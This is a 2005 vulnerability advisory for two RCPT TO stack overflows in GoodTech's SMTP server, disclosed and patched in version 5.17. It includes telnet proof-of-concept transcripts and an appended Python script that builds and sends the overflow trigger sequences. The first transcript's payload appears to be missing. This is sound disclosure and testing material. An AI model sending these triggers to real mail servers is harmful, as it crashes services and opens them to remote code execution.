Arbitrary code execution in GoodTech's SMTP server
discovered by Raphaël Rigo

Product:              SMTP server by GoodTech Systems
Affected versions:    5.16 Evaluation (verified); registered 5.16 and earlier (including 5.15) probably too
Not affected version: 5.17
OS affected:          All Windows NT family (NT/2K/XP/2K3)
Risk:                 Critical
Remote exploit:       yes
URL:                  http://www.goodtechsys.com/smtpdnt2000.asp

Overview
========

The product provides Simple Mail Transfer Protocol (SMTP) service to any email client out of the box and forwards email messages directly to their recipients. GoodTech SMTP server runs as a Windows service on the host machine, by default under the SYSTEM account.

Vulnerabilities
===============

1) Stack overflow in RCPT TO command handling

A cascade of unchecked string copies allows a classic stack overflow.

Details :

The following sequence of unchecked copies is responsible for this vulnerability :

- The maximum length of a command is 4096 bytes.
- The requested email address is copied into a 2048-byte buffer without any length check (no direct consequence yet).
- The domain part is extracted and copied into a 256-byte buffer without any length check (still no direct consequence).
- The following code is then executed :

      sprintf(buf, "mx.%s", domain)

  buf is only 64 bytes long and is therefore overflowed, overwriting a string that holds the DNS server to be used to resolve the MX record.
- Because that string is now non-empty, the following code is executed :

      sprintf(buf1024, "Using DNS Server %s", dnsserver)

  Since roughly 4000 bytes are available for the domain, this copy also overflows and overwrites the return address of the function, allowing arbitrary code execution.

Risk : Critical

The attacker may execute arbitrary code with the privileges of the SYSTEM user (the service account by default).

Proof of concept :

    $ telnet localhost 25
    Connected to localhost.
    Escape character is '^]'.
    220 test Simple Mail Transfer Service Ready. Version 5.15 (Evaluation)
    HELO aaa
    250 OK
    RCPT TO:
    Connection closed by foreign host.

Service crashes with EIP==0x41414141.

Workaround :

There is no workaround within the product. Until the upgrade is installed, exposure can only be reduced by restricting access to TCP port 25 to trusted networks.

Solution :

Update to v5.17 (5.16 is the vulnerable version).

-----------------------------------------------------------------------

2) Stack overflow in handling of multiple RCPT TO commands

An unchecked string copy allows a classic stack overflow.

Details :

For each RCPT TO command, the server fills a 1300-byte structure containing the requested command and the MX server for the requested email address. The server accepts up to 99 RCPT TO commands for a single mail, but the structure is filled with an unchecked string copy : the command, up to 4096 bytes long, is copied into the structure without any length check.

This makes it possible to overwrite the return address of the connection thread by sending an overlong command as the 99th RCPT TO. A QUIT command must then be issued so that the thread exits and returns through the overwritten address, executing the attacker's code.

Risk : Critical

The attacker may execute arbitrary code with the privileges of the SYSTEM user (the service account by default).

Proof of concept :

    $ telnet localhost 25
    Connected to localhost.
    Escape character is '^]'.
    220 test Simple Mail Transfer Service Ready. Version 5.15 (Evaluation)
    HELO aaa
    250 OK
    -- Repeat this part 98 times
    RCPT TO:
    250 OK
    --
    RCPT TO: <|'A'x2600|@localhost>
    250 OK
    QUIT
    Connection closed by foreign host.

(|'A'x2600| stands for 2600 'A' characters.) Service crashes with EIP==0x41414141.

Workaround :

There is no workaround within the product. Until the upgrade is installed, exposure can only be reduced by restricting access to TCP port 25 to trusted networks.

Solution :

Update to v5.17 (5.16 is the vulnerable version).

-----------------------------------------------------------------------

Acknowledgments
===============

Thanks to the developer for the quick response and fix.

Timeline
========

2005-07-19  Discovery
2005-07-21  First attempt to contact developer
2005-07-21  Developer reply
2005-07-22  Fixed version released
2005-07-23  Advisory published
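The Python script below is an added example, not part of the advisory or of the vendor's code. It turns the two telnet transcripts above into a repeatable check: it builds both trigger sequences (the long-domain RCPT TO for issue 1, and 98 harmless RCPT TO commands followed by an overlong 99th and QUIT for issue 2), sends them one command at a time, and records where the server stops answering. The payload sizes (a 4000-byte domain, a 2600-byte local part), the filler address a@localhost, and the ModelServer class are this example's assumptions; ModelServer is a loopback stand-in whose crash thresholds are simplified from the buffer sizes the advisory gives, so the client logic can be exercised offline, and it is not the GoodTech code.

```python
"""Reproduction helper for the two RCPT TO overflows in the advisory above.

Added example, not the advisory author's code. The wire exchange mirrors the
telnet transcripts; payload sizes, the a@localhost filler and the ModelServer
thresholds are assumptions of this example.
"""
import socket
import threading

CMD_MAX = 4096      # longest command the server accepts (from the advisory)
MX_BUF = 64         # target of sprintf(buf, "mx.%s", domain) (from the advisory)
RCPT_STRUCT = 1300  # per-RCPT structure the command is copied into (from the advisory)
RCPT_MAX = 99       # RCPT TO commands accepted per message (from the advisory)
CRLF = "\r\n"


def rcpt_to(address):
    return "RCPT TO:<%s>%s" % (address, CRLF)


def long_domain_sequence(domain_len=4000):
    """Issue 1: one RCPT TO whose domain overruns the 64-byte "mx.%s" buffer and,
    through the clobbered DNS-server string, the 1024-byte message buffer.
    4000 is the advisory's "~4000 bytes"; the exact value is an assumption."""
    cmd = rcpt_to("a@" + "A" * domain_len)
    if len(cmd) - len(CRLF) > CMD_MAX:
        raise ValueError("command exceeds the %d-byte limit the server enforces" % CMD_MAX)
    return ["HELO aaa" + CRLF, cmd]


def multi_rcpt_sequence(local_len=2600):
    """Issue 2: 98 harmless RCPT TO, a 99th longer than its 1300-byte slot, then
    QUIT so the thread returns through the overwritten return address."""
    seq = ["HELO aaa" + CRLF] + [rcpt_to("a@localhost")] * (RCPT_MAX - 1)
    seq.append(rcpt_to("A" * local_len + "@localhost"))
    seq.append("QUIT" + CRLF)
    return seq


def run_sequence(host, port, sequence, timeout=5.0):
    """Send commands one at a time and collect replies. A None reply means the
    peer closed the socket, the crash indicator in the advisory's transcripts;
    a patched server should keep answering instead."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rb")
        replies.append(f.readline().decode(errors="replace") or None)  # banner
        for cmd in sequence:
            try:
                s.sendall(cmd.encode())
                line = f.readline().decode(errors="replace")
            except OSError:          # reset or broken pipe: server is gone
                line = ""
            replies.append(line or None)
            if not line:
                break
    return replies


class ModelServer(threading.Thread):
    """Loopback stand-in (not the vulnerable product) that drops the connection
    where the advisory says the real server smashes its stack. Simplified:
    any domain that does not fit the 64-byte mx buffer is treated as fatal,
    and only the 99th RCPT TO slot overrun is tracked, since earlier slots
    spill into the next structure rather than the return address."""

    def __init__(self):
        super().__init__(daemon=True)
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]

    def run(self):
        conn, _ = self.sock.accept()
        self.sock.close()
        with conn:
            f = conn.makefile("rb")
            conn.sendall(b"220 test Simple Mail Transfer Service Ready." + CRLF.encode())
            rcpts, ret_addr_clobbered = 0, False
            while True:
                raw = f.readline()
                if not raw:
                    return                          # client went away
                line = raw.decode(errors="replace").rstrip(CRLF)
                if line.upper().startswith("RCPT TO:"):
                    rcpts += 1
                    domain = line.rpartition("@")[2].rstrip(">")
                    if len("mx." + domain) + 1 > MX_BUF:            # issue 1
                        return                      # "crash": socket closed, no reply
                    if rcpts == RCPT_MAX and len(line) + 1 > RCPT_STRUCT:
                        ret_addr_clobbered = True   # issue 2 fires when the thread exits
                elif line.upper() == "QUIT" and ret_addr_clobbered:
                    return
                conn.sendall(b"250 OK" + CRLF.encode())
```

Usage: start a ModelServer (or point at a lab copy of the product, never a production host) and call run_sequence("127.0.0.1", port, multi_rcpt_sequence()). Against a vulnerable 5.16 server the final reply is None exactly where the transcripts show "Connection closed by foreign host"; a 5.17 server should keep answering (250 OK or an SMTP error code) for both sequences.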